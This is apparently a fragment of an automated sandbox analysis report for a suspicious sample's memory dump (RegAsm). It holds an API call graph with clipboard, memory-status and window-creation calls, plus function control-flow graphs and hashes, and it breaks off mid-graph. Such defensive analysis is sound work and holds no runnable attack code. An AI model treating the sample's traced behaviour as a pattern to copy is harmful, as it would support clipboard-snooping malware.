61d5f7c 2 API calls 38356->38357 38357->38356 38358 61d72f6 38357->38358 38359 61d76f0 OleGetClipboard 38357->38359 38360 61d76e0 OleGetClipboard 38357->38360 38358->38330 38359->38357 38360->38357 38362 61d5f87 38361->38362 38363 61d73fc 38362->38363 38364 61d7352 38362->38364 38365 61d0624 OleGetClipboard 38363->38365 38366 61d73aa CallWindowProcW 38364->38366 38367 61d7359 38364->38367 38365->38367 38366->38367 38367->38330 38369 61d770f 38368->38369 38370 61d7751 38369->38370 38378 61d78a8 38369->38378 38384 61d789a 38369->38384 38370->38351 38374 61d770f 38373->38374 38375 61d7751 38374->38375 38376 61d78a8 OleGetClipboard 38374->38376 38377 61d789a OleGetClipboard 38374->38377 38375->38351 38376->38374 38377->38374 38379 61d78b0 38378->38379 38380 61d78c4 38379->38380 38390 61d78f0 38379->38390 38401 61d78e0 38379->38401 38380->38369 38381 61d78d9 38381->38369 38385 61d78a8 38384->38385 38386 61d78c4 38385->38386 38388 61d78f0 OleGetClipboard 38385->38388 38389 61d78e0 OleGetClipboard 38385->38389 38386->38369 38387 61d78d9 38387->38369 38388->38387 38389->38387 38391 61d7902 38390->38391 38392 61d791d 38391->38392 38394 61d7961 38391->38394 38397 61d78f0 OleGetClipboard 38392->38397 38398 61d78e0 OleGetClipboard 38392->38398 38393 61d7923 38393->38381 38396 61d79e1 38394->38396 38412 61d7fb0 38394->38412 38416 61d7fc0 38394->38416 38395 61d79ff 38395->38381 38396->38381 38397->38393 38398->38393 38402 61d78f0 38401->38402 38403 61d791d 38402->38403 38405 61d7961 38402->38405 38410 61d78f0 OleGetClipboard 38403->38410 38411 61d78e0 OleGetClipboard 38403->38411 38404 61d7923 38404->38381 38407 61d79e1 38405->38407 38408 61d7fb0 OleGetClipboard 38405->38408 38409 61d7fc0 OleGetClipboard 38405->38409 38406 61d79ff 38406->38381 38407->38381 38408->38406 38409->38406 38410->38404 38411->38404 38414 61d7fc0 38412->38414 38415 61d7ffb 38414->38415 38420 61d7c18 38414->38420 38415->38395 38418 61d7fd5 38416->38418 38417 61d7c18 OleGetClipboard 38417->38418 38418->38417 38419 61d7ffb 38418->38419 38419->38395 38421 61d8068 OleGetClipboard 38420->38421 38423 61d8102 38421->38423 38223 61d7610 38225 61d7618 38223->38225 38226 61d763b 38225->38226 38227 61d5fd4 38225->38227 38228 61d7650 KiUserCallbackDispatcher 38227->38228 38230 61d76be 38228->38230 38230->38225 38231 e50848 38232 e5084e 38231->38232 38233 e5091b 38232->38233 38236 e51333 38232->38236 38244 e51438 38232->38244 38237 e5133b 38236->38237 38239 e51262 38236->38239 38238 e51430 38237->38238 38243 e51438 2 API calls 38237->38243 38251 e5f848 38237->38251 38255 e5f838 38237->38255 38259 e57e60 38237->38259 38238->38232 38239->38232 38243->38237 38245 e51346 38244->38245 38246 e51430 38245->38246 38247 e51438 2 API calls 38245->38247 38248 e57e60 GlobalMemoryStatusEx 38245->38248 38249 e5f848 CreateWindowExW 38245->38249 38250 e5f838 CreateWindowExW 38245->38250 38246->38232 38247->38245 38248->38245 38249->38245 38250->38245 38252 e5f85a 38251->38252 38254 e5f8d1 38252->38254 38267 e5f474 38252->38267 38254->38237 38256 e5f85a 38255->38256 38257 e5f474 CreateWindowExW 38256->38257 38258 e5f8d1 38256->38258 38257->38258 38258->38237 38260 e57e6a 38259->38260 38261 e57eac 38260->38261 38285 61ef958 38260->38285 38289 61ef949 38260->38289 38261->38237 38262 e57e7d 38293 e5eb39 38262->38293 38298 e5eb48 38262->38298 38268 e5f47f 38267->38268 38272 61d0ac8 38268->38272 38276 61d0ab3 38268->38276 38269 e5fab2 38269->38254 38273 61d0af3 38272->38273 38274 61d0ba2 38273->38274 38280 61d254d 38273->38280 38277 61d0af3 38276->38277 38278 61d0ba2 38277->38278 38279 61d254d CreateWindowExW 38277->38279 38279->38278 38281 61d2551 38280->38281 38282 61d257d 38281->38282 38283 61d265b CreateWindowExW 38281->38283 38282->38274 38284 61d26bc 38283->38284 38284->38284 38286 61ef96d 38285->38286 38287 61efb7e 38286->38287 38288 61efb98 GlobalMemoryStatusEx 38286->38288 38287->38262 38288->38286 38290 61ef96d 38289->38290 38291 61efb7e 38290->38291 38292 61efb98 GlobalMemoryStatusEx 38290->38292 38291->38262 38292->38290 38294 e5eaff 38293->38294 38295 e5eb42 38293->38295 38294->38261 38296 e5eda9 38295->38296 38297 61efb98 GlobalMemoryStatusEx 38295->38297 38296->38261 38297->38295 38300 e5eb62 38298->38300 38299 e5eda9 38299->38261 38300->38299 38301 61efb98 GlobalMemoryStatusEx 38300->38301 38301->38300 38302 61d14f0 38303 61d1538 GetModuleHandleW 38302->38303 38304 61d1532 38302->38304 38305 61d1565 38303->38305 38304->38303

                                                  Executed Functions

                                                  Function 061E3050 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 127 61e3050-61e3071 128 61e3073-61e3076 127->128 129 61e309c-61e309f 128->129 130 61e3078-61e3097 128->130 131 61e30a5-61e30c4 129->131 132 61e3840-61e3842 129->132 130->129 140 61e30dd-61e30e7 131->140 141 61e30c6-61e30c9 131->141 134 61e3849-61e384c 132->134 135 61e3844 132->135 134->128 136 61e3852-61e385b 134->136 135->134 144 61e30ed-61e30fc 140->144 141->140 142 61e30cb-61e30db 141->142 142->144 253 61e30fe call 61e3868 144->253 254 61e30fe call 61e3870 144->254 146 61e3103-61e3108 147 61e310a-61e3110 146->147 148 61e3115-61e33f2 146->148 147->136 169 61e33f8-61e34a7 148->169 170 61e3832-61e383f 148->170 179 61e34a9-61e34ce 169->179 180 61e34d0 169->180 182 61e34d9-61e34ec 179->182 180->182 184 61e3819-61e3825 182->184 185 61e34f2-61e3514 182->185 184->169 186 61e382b 184->186 185->184 188 61e351a-61e3524 185->188 186->170 188->184 189 61e352a-61e3535 188->189 189->184 190 61e353b-61e3611 189->190 202 61e361f-61e364f 190->202 203 61e3613-61e3615 190->203 207 61e365d-61e3669 202->207 208 61e3651-61e3653 202->208 203->202 209 61e366b-61e366f 207->209 210 61e36c9-61e36cd 207->210 208->207 209->210 211 61e3671-61e369b 209->211 212 61e380a-61e3813 210->212 213 61e36d3-61e370f 210->213 220 61e369d-61e369f 211->220 221 61e36a9-61e36c6 211->221 212->184 212->190 223 61e371d-61e372b 213->223 224 61e3711-61e3713 213->224 220->221 221->210 227 61e372d-61e3738 223->227 228 61e3742-61e374d 223->228 224->223 227->228 233 61e373a 227->233 231 61e374f-61e3755 228->231 232 61e3765-61e3776 228->232 234 61e3759-61e375b 231->234 235 61e3757 231->235 237 61e378e-61e379a 232->237 238 61e3778-61e377e 232->238 233->228 234->232 235->232 242 61e379c-61e37a2 237->242 243 61e37b2-61e3803 237->243 239 61e3782-61e3784 238->239 240 61e3780 238->240 239->237 240->237 244 61e37a6-61e37a8 242->244 245 61e37a4 242->245 243->212 244->243 245->243 253->146 254->146
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-2069967915
                                                  • Opcode ID: 5ea80c05c32e402910fbf91d44dc72a5dcc29b65d9446e3789fa41112023b13a
                                                  • Instruction ID: 2364319d893ecb998fa678710091d5479e389663d27b1fcddf87cd49ab51c7bf
                                                  • Opcode Fuzzy Hash: 5ea80c05c32e402910fbf91d44dc72a5dcc29b65d9446e3789fa41112023b13a
                                                  • Instruction Fuzzy Hash: 01322E31E10B19CFDB14EF75D89069DF7B2BF89300F2196A9D419AB254EB30E985CB90
                                                  Function 061E7D78 Relevance: 3.0, Strings: 2, Instructions: 476COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 796 61e7d78-61e7d96 797 61e7d98-61e7d9b 796->797 798 61e7dbe-61e7dc1 797->798 799 61e7d9d-61e7db9 797->799 800 61e7de2-61e7de5 798->800 801 61e7dc3-61e7ddd 798->801 799->798 802 61e7dfc-61e7dff 800->802 803 61e7de7-61e7df5 800->803 801->800 806 61e7e0c-61e7e0e 802->806 807 61e7e01-61e7e0b 802->807 812 61e7e1e-61e7e34 803->812 814 61e7df7 803->814 810 61e7e15-61e7e18 806->810 811 61e7e10 806->811 810->797 810->812 811->810 816 61e804f-61e8059 812->816 817 61e7e3a-61e7e43 812->817 814->802 818 61e805a-61e8064 817->818 819 61e7e49-61e7e66 817->819 822 61e8066-61e808f 818->822 823 61e80b5-61e80bb 818->823 829 61e803c-61e8049 819->829 830 61e7e6c-61e7e94 819->830 831 61e8091-61e8094 822->831 824 61e80bf-61e80c1 823->824 825 61e80bd 823->825 828 61e80cb-61e80cf 824->828 825->828 832 61e80dd 828->832 833 61e80d1-61e80db 828->833 829->816 829->817 830->829 852 61e7e9a-61e7ea3 830->852 834 61e809a-61e80a6 831->834 835 61e8141-61e8144 831->835 838 61e80e2-61e80e4 832->838 833->838 840 61e80b1-61e80b3 834->840 836 61e8146-61e8162 835->836 837 61e8167-61e816a 835->837 836->837 843 61e839f-61e83a1 837->843 844 61e8170-61e817f 837->844 841 61e80fb-61e8134 838->841 842 61e80e6-61e80e9 838->842 840->823 840->828 841->844 871 61e8136-61e8140 841->871 848 61e83b1-61e83ba 842->848 845 61e83a8-61e83ab 843->845 846 61e83a3 843->846 855 61e819e-61e81e2 844->855 856 61e8181-61e819c 844->856 845->831 845->848 846->845 852->818 853 61e7ea9-61e7ec5 852->853 862 61e802a-61e8036 853->862 863 61e7ecb-61e7ef5 853->863 864 61e81e8-61e81f9 855->864 865 61e8373-61e8389 855->865 856->855 862->829 862->852 879 61e7efb-61e7f23 863->879 880 61e8020-61e8025 863->880 873 61e835e-61e836d 864->873 874 61e81ff-61e821c 864->874 865->843 873->864 873->865 874->873 882 61e8222-61e8318 call 61e6598 874->882 879->880 888 61e7f29-61e7f57 879->888 880->862 931 61e831a-61e8324 882->931 932 61e8326 882->932 888->880 893 61e7f5d-61e7f66 888->893 893->880 894 61e7f6c-61e7f9e 893->894 902 61e7fa9-61e7fc5 894->902 903 61e7fa0-61e7fa4 894->903 902->862 906 61e7fc7-61e801e call 61e6598 902->906 903->880 905 61e7fa6 903->905 905->902 906->862 933 61e832b-61e832d 931->933 932->933 933->873 934 61e832f-61e8334 933->934 935 61e8336-61e8340 934->935 936 61e8342 934->936 937 61e8347-61e8349 935->937 936->937 937->873 938 61e834b-61e8357 937->938 938->873
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q
                                                  • API String ID: 0-3126353813
                                                  • Opcode ID: e7d8410523d34d56df064c4ff597eb0ceab154ebc18391749676c6de84382e56
                                                  • Instruction ID: 74b51369aaeff9e93f80dc96ef9a2863828e29fcb98c280b1e600dd4f6ad442a
                                                  • Opcode Fuzzy Hash: e7d8410523d34d56df064c4ff597eb0ceab154ebc18391749676c6de84382e56
                                                  • Instruction Fuzzy Hash: 13027E34B00A059FDBA4DB68D850BAEB7E2FF84310F248569E415DB395DB71ED82CB90
                                                  Function 061E5598 Relevance: 1.9, Strings: 1, Instructions: 603COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: f2c97ad48ba15574ffaa44a147aaec8eaa2d133c50736770ae02860b1df89624
                                                  • Instruction ID: 0e5d98f0c6d33c4cd109cf8ae0149734c59e14723215a38749bb8067c47271e7
                                                  • Opcode Fuzzy Hash: f2c97ad48ba15574ffaa44a147aaec8eaa2d133c50736770ae02860b1df89624
                                                  • Instruction Fuzzy Hash: 8222A135F006148FDF64DBA4C590AAEBBB3EF89314F24846AD405AB395DB32DD41CBA1
                                                  Function 061E2340 Relevance: 1.0, Instructions: 1014COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3edbe69014a52daab631ab564f158a302b7f1d1e59b11369a102bfbb05ad443
                                                  • Instruction ID: a1b36584fdf28855d4cab5940d5a1324468eeb181108b94cb2b4ea0fe011c28f
                                                  • Opcode Fuzzy Hash: e3edbe69014a52daab631ab564f158a302b7f1d1e59b11369a102bfbb05ad443
                                                  • Instruction Fuzzy Hash: D8926634E006048FDBA4CB68C5A4B9DBBF2EB49314F5884A9D409EB365DB35ED85CB90
                                                  Function 061E65E8 Relevance: .8, Instructions: 813COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b0dfe5c1ec1b5ed5fae73a3424ed0298bf231f712d03c58f1d8e05caa855f20
                                                  • Instruction ID: ec99b9a47b99a9c48c083794ec43999cf3c5ca4e117ee333d5a4569cc1f2ef9e
                                                  • Opcode Fuzzy Hash: 2b0dfe5c1ec1b5ed5fae73a3424ed0298bf231f712d03c58f1d8e05caa855f20
                                                  • Instruction Fuzzy Hash: 01629934B006049FDB64DB68D594BADBBF2EF88310F648469E416EB394DB35ED42CB90
                                                  Function 061EC188 Relevance: .6, Instructions: 638COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5cdcd3dca5d2850f10c7ebaaf312073043e58e30f0b058c4955a9630eaa3bf6d
                                                  • Instruction ID: c1170bb8861a153e5cfd9788f03fa70709908fb272e812b5dbfb37e96fb45e51
                                                  • Opcode Fuzzy Hash: 5cdcd3dca5d2850f10c7ebaaf312073043e58e30f0b058c4955a9630eaa3bf6d
                                                  • Instruction Fuzzy Hash: AA329D34F006099FDB64DB68D890BAEB7B2FB89310F148965E415EB395DB34EC42CB91
                                                  Function 061EB228 Relevance: .6, Instructions: 573COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b5a5e5ed729e2d14c50ca6e0ea9bc52f3213b66fc04944062ce9ece50da9303c
                                                  • Instruction ID: 4e95a1cfeea06b5f5c0d54db13bc9ab41f1f8e4c42c1179169994abc02a85971
                                                  • Opcode Fuzzy Hash: b5a5e5ed729e2d14c50ca6e0ea9bc52f3213b66fc04944062ce9ece50da9303c
                                                  • Instruction Fuzzy Hash: C0227F30E146098FEF64DB68D690BADB7B2EF49310F248466E415EB395DB34DC81CBA1
                                                  Function 061EACD0 Relevance: 10.4, Strings: 8, Instructions: 398COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 61eacd0-61eacee 2 61eacf0-61eacf3 0->2 3 61ead04-61ead07 2->3 4 61eacf5-61eacf9 2->4 7 61ead2a-61ead2d 3->7 8 61ead09-61ead25 3->8 5 61eacff 4->5 6 61eaefc-61eaf06 4->6 5->3 9 61ead2f-61ead38 7->9 10 61ead3d-61ead40 7->10 8->7 9->10 11 61ead54-61ead57 10->11 12 61ead42-61ead4f 10->12 14 61ead59-61ead5e 11->14 15 61ead61-61ead64 11->15 12->11 14->15 17 61eaeed-61eaef6 15->17 18 61ead6a-61ead6d 15->18 17->6 22 61ead8c-61ead95 17->22 20 61ead6f-61ead82 18->20 21 61ead87-61ead8a 18->21 20->21 21->22 23 61eada4-61eada6 21->23 24 61ead9b-61ead9f 22->24 25 61eaf07-61eaf19 22->25 27 61eadad-61eadb0 23->27 28 61eada8 23->28 24->23 31 61eaf1b-61eaf2e 25->31 32 61eaf31-61eaf3e 25->32 27->2 29 61eadb6-61eadda 27->29 28->27 41 61eaeea 29->41 42 61eade0-61eadef 29->42 31->32 34 61eaf40-61eaf43 32->34 35 61eaf45-61eaf49 34->35 36 61eaf50-61eaf53 34->36 37 61eaf4b 35->37 38 61eaf59-61eaf94 35->38 36->38 39 61eb1bc-61eb1bf 36->39 37->36 50 61eaf9a-61eafa6 38->50 51 61eb187-61eb19a 38->51 43 61eb1ce-61eb1d1 39->43 44 61eb1c1 call 61eb228 39->44 41->17 57 61eae07-61eae42 call 61e6598 42->57 58 61eadf1-61eadf7 42->58 46 61eb1de-61eb1e1 43->46 47 61eb1d3-61eb1dd 43->47 53 61eb1c7-61eb1c9 44->53 48 61eb204-61eb206 46->48 49 61eb1e3-61eb1ff 46->49 54 61eb20d-61eb210 48->54 55 61eb208 48->55 49->48 64 61eafa8-61eafc1 50->64 65 61eafc6-61eb00a 50->65 56 61eb19c 51->56 53->43 54->34 61 61eb216-61eb220 54->61 55->54 56->39 77 61eae5a-61eae71 57->77 78 61eae44-61eae4a 57->78 62 61eadfb-61eadfd 58->62 63 61eadf9 58->63 62->57 63->57 64->56 82 61eb00c-61eb01e 65->82 83 61eb026-61eb065 65->83 88 61eae89-61eae9a 77->88 89 61eae73-61eae79 77->89 80 61eae4e-61eae50 78->80 81 61eae4c 78->81 80->77 81->77 82->83 90 61eb14c-61eb161 83->90 91 61eb06b-61eb146 call 61e6598 83->91 99 61eae9c-61eaea2 88->99 100 61eaeb2-61eaee3 88->100 92 61eae7d-61eae7f 89->92 93 61eae7b 89->93 90->51 91->90 92->88 93->88 102 61eaea6-61eaea8 99->102 103 61eaea4 99->103 100->41 102->100 103->100
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-3886557441
                                                  • Opcode ID: 0de2d330c8296d136bccc06b50dc7de7ce517d9c4118394909720e9199d6880d
                                                  • Instruction ID: c55bc91624c44dc3c05864d6691728521fab0b5945a08d8adb7d9f9cdf43ba93
                                                  • Opcode Fuzzy Hash: 0de2d330c8296d136bccc06b50dc7de7ce517d9c4118394909720e9199d6880d
                                                  • Instruction Fuzzy Hash: A2E18F34E00B098FDB64DB69D8906AEB7F2FF85310F248529E405AB355DB35DC46CB91
                                                  Function 061EB648 Relevance: 8.0, Strings: 6, Instructions: 475COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 255 61eb648-61eb668 256 61eb66a-61eb66d 255->256 257 61eb66f-61eb68b 256->257 258 61eb690-61eb693 256->258 257->258 259 61eb695-61eb69b 258->259 260 61eb6a0-61eb6a3 258->260 259->260 262 61eb6a9-61eb6ac 260->262 263 61eb807-61eb80a 260->263 265 61eb6ae-61eb6b7 262->265 266 61eb6c2-61eb6c5 262->266 264 61eb80f-61eb812 263->264 264->263 269 61eb814-61eb817 264->269 267 61eb8ce-61eb8d7 265->267 268 61eb6bd 265->268 270 61eb6d9-61eb6dc 266->270 271 61eb6c7-61eb6ce 266->271 279 61eb9ed-61eba26 267->279 280 61eb8dd-61eb8e4 267->280 268->266 273 61eb83d-61eb840 269->273 274 61eb819-61eb820 269->274 277 61eb6de-61eb6e5 270->277 278 61eb706-61eb709 270->278 275 61eb6d4 271->275 276 61eb9c2-61eb9cb 271->276 284 61eb862-61eb865 273->284 285 61eb842-61eb85d 273->285 274->279 282 61eb826-61eb836 274->282 275->270 286 61eb9d0-61eb9d2 276->286 277->279 283 61eb6eb-61eb6fb 277->283 287 61eb70b-61eb712 278->287 288 61eb723-61eb726 278->288 299 61eba28-61eba2b 279->299 281 61eb8e9-61eb8ec 280->281 290 61eb8ee-61eb8f7 281->290 291 61eb8fc-61eb8ff 281->291 282->263 316 61eb838 282->316 283->274 321 61eb701 283->321 295 61eb867-61eb86a 284->295 296 61eb875-61eb878 284->296 285->284 292 61eb9d9-61eb9dc 286->292 293 61eb9d4 286->293 287->279 294 61eb718-61eb71e 287->294 297 61eb77b-61eb77e 288->297 298 61eb728-61eb776 call 61e6598 288->298 290->291 291->295 300 61eb905-61eb908 291->300 292->256 310 61eb9e2-61eb9ec 292->310 293->292 294->288 305 61eb7d5-61eb7d8 295->305 306 61eb870 295->306 307 61eb87a-61eb883 296->307 308 61eb888-61eb88b 296->308 303 61eb7bd-61eb7c0 297->303 304 61eb780-61eb795 297->304 298->297 312 61eba4e-61eba51 299->312 313 61eba2d-61eba49 299->313 314 61eb90a-61eb911 300->314 315 61eb922-61eb925 300->315 303->265 319 61eb7c6-61eb7c9 303->319 304->279 340 61eb79b-61eb7b8 304->340 305->279 320 61eb7de-61eb7e5 305->320 306->296 307->308 317 61eb89d-61eb8a0 308->317 318 61eb88d 308->318 326 61ebcbd-61ebcbf 312->326 327 61eba57-61eba7f 312->327 313->312 314->279 323 61eb917-61eb91d 314->323 324 61eb93f-61eb942 315->324 325 61eb927-61eb92e 315->325 316->273 332 61eb8a2-61eb8ae 317->332 333 61eb8b3-61eb8b6 317->333 341 61eb895-61eb898 318->341 330 61eb7cb-61eb7cd 319->330 331 61eb7d0-61eb7d3 319->331 334 61eb7ea-61eb7ed 320->334 321->278 323->315 338 61eb96c-61eb96f 324->338 339 61eb944-61eb94b 324->339 325->279 337 61eb934-61eb93a 325->337 342 61ebcc6-61ebcc9 326->342 343 61ebcc1 326->343 370 61eba89-61ebacd 327->370 371 61eba81-61eba84 327->371 330->331 331->305 331->334 332->333 333->263 344 61eb8bc-61eb8bf 333->344 345 61eb7ef-61eb7f0 334->345 346 61eb7f5-61eb7f8 334->346 337->324 349 61eb9aa-61eb9ad 338->349 350 61eb971-61eb986 338->350 339->279 348 61eb951-61eb961 339->348 340->303 341->317 342->299 351 61ebccf-61ebcd8 342->351 343->342 353 61eb8c9-61eb8cc 344->353 354 61eb8c1-61eb8c6 344->354 345->346 355 61eb7fa-61eb7fd 346->355 356 61eb802-61eb805 346->356 348->277 366 61eb967 348->366 360 61eb9af-61eb9b8 349->360 361 61eb9bd-61eb9c0 349->361 350->279 367 61eb988-61eb9a5 350->367 353->267 353->281 354->353 355->356 356->263 356->264 360->361 361->276 361->286 366->338 367->349 378 61ebcb2-61ebcbc 370->378 379 61ebad3-61ebadc 370->379 371->351 380 61ebca8-61ebcad 379->380 381 61ebae2-61ebb4e call 61e6598 379->381 380->378 389 61ebc48-61ebc5d 381->389 390 61ebb54-61ebb59 381->390 389->380 391 61ebb5b-61ebb61 390->391 392 61ebb75 390->392 394 61ebb67-61ebb69 391->394 395 61ebb63-61ebb65 391->395 396 61ebb77-61ebb7d 392->396 397 61ebb73 394->397 395->397 398 61ebb7f-61ebb85 396->398 399 61ebb92-61ebb9f 396->399 397->396 400 61ebb8b 398->400 401 61ebc33-61ebc42 398->401 406 61ebbb7-61ebbc4 399->406 407 61ebba1-61ebba7 399->407 400->399 402 61ebbfa-61ebc07 400->402 403 61ebbc6-61ebbd3 400->403 401->389 401->390 412 61ebc1f-61ebc2c 402->412 413 61ebc09-61ebc0f 402->413 415 61ebbeb-61ebbf8 403->415 416 61ebbd5-61ebbdb 403->416 406->401 409 61ebbab-61ebbad 407->409 410 61ebba9 407->410 409->406 410->406 412->401 417 61ebc13-61ebc15 413->417 418 61ebc11 413->418 415->401 419 61ebbdf-61ebbe1 416->419 420 61ebbdd 416->420 417->412 418->412 419->415 420->415
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q$$q$$q
                                                  • API String ID: 0-2069967915
                                                  • Opcode ID: fe56ec5fa693daee2131abc98585adae9b62fa8862e5f399a1dfa2ea3fc5dbb4
                                                  • Instruction ID: 2d3cb3efa0510418c2fc9057eadb8245567d294a0f269140e64fdcf94145398f
                                                  • Opcode Fuzzy Hash: fe56ec5fa693daee2131abc98585adae9b62fa8862e5f399a1dfa2ea3fc5dbb4
                                                  • Instruction Fuzzy Hash: 68026B30E0460A8FDBA4DB68D690AADB7F1FF85310F24896AE415EB355DB30DC81CB91
                                                  Function 061E9150 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 423 61e9150-61e9175 424 61e9177-61e917a 423->424 425 61e9a38-61e9a3b 424->425 426 61e9180-61e9195 424->426 427 61e9a3d-61e9a5c 425->427 428 61e9a61-61e9a63 425->428 433 61e91ad-61e91c3 426->433 434 61e9197-61e919d 426->434 427->428 430 61e9a6a-61e9a6d 428->430 431 61e9a65 428->431 430->424 435 61e9a73-61e9a7d 430->435 431->430 440 61e91ce-61e91d0 433->440 436 61e919f 434->436 437 61e91a1-61e91a3 434->437 436->433 437->433 441 61e91e8-61e9259 440->441 442 61e91d2-61e91d8 440->442 453 61e925b-61e927e 441->453 454 61e9285-61e92a1 441->454 443 61e91dc-61e91de 442->443 444 61e91da 442->444 443->441 444->441 453->454 459 61e92cd-61e92e8 454->459 460 61e92a3-61e92c6 454->460 465 61e92ea-61e930c 459->465 466 61e9313-61e932e 459->466 460->459 465->466 471 61e9353-61e9361 466->471 472 61e9330-61e934c 466->472 473 61e9363-61e936c 471->473 474 61e9371-61e93eb 471->474 472->471 473->435 480 61e93ed-61e940b 474->480 481 61e9438-61e944d 474->481 485 61e940d-61e941c 480->485 486 61e9427-61e9436 480->486 481->425 485->486 486->480 486->481
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3680150257.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_61e0000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q$$q$$q
                                                  • API String ID: 0-4102054182
                                                  • Opcode ID: e50524d50711b07ac1b2524aacd241cc72afad8ac1ebcd09b9fb010da6095e5b
                                                  • Instruction ID: c7a7cfb565284c718123cd2c49e36b6bf1b610e3be8e168571ea0c77032b7382
                                                  • Opcode Fuzzy Hash: e50524d50711b07ac1b2524aacd241cc72afad8ac1ebcd09b9fb010da6095e5b
                                                  • Instruction Fuzzy Hash: DC911E30B0061A9FDB64DB79D8617AEB7F2BF89300F1089A5D819AB344EF70DD458B91
                                                  Function 061ECF48 Relevance: 4.6, Strings: 3, Instructions: 800COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 489 61ecf48-61ecf63 490 61ecf65-61ecf68 489->490 491 61ecf6a-61ecfac 490->491 492 61ecfb1-61ecfb4 490->492 491->492 493 61ecfb6-61ecfb8 492->493 494 61ecfc3-61ecfc6 492->494 496 61ecfbe 493->496 497 61ed42d 493->497 498 61ed00f-61ed012 494->498 499 61ecfc8-61ed00a 494->499 496->494 500 61ed430-61ed43c 497->500 501 61ed014-61ed030 498->501 502 61ed035-61ed038 498->502 499->498 506 61ed442-61ed72f 500->506 507 61ed1c3-61ed1d2 500->507 501->502 504 61ed03a-61ed03f 502->504 505 61ed042-61ed045 502->505 504->505 511 61ed08e-61ed091 505->511 512 61ed047-61ed089 505->512 701 61ed956-61ed960 506->701 702 61ed735-61ed73b 506->702 509 61ed1d4-61ed1d9 507->509 510 61ed1e1-61ed1ed 507->510 509->510 514 61ed1f3-61ed205 510->514 515 61ed961-61ed996 510->515 519 61ed0da-61ed0dd 511->519 520 61ed093-61ed0d5 511->520 512->511 536 61ed20a-61ed20d 514->536 533 61ed998-61ed99b 515->533 522 61ed0df-61ed121 519->522 523 61ed126-61ed129 519->523 520->519 522->523 529 61ed12b-61ed16d 523->529 530 61ed172-61ed175 523->530 529->530 534 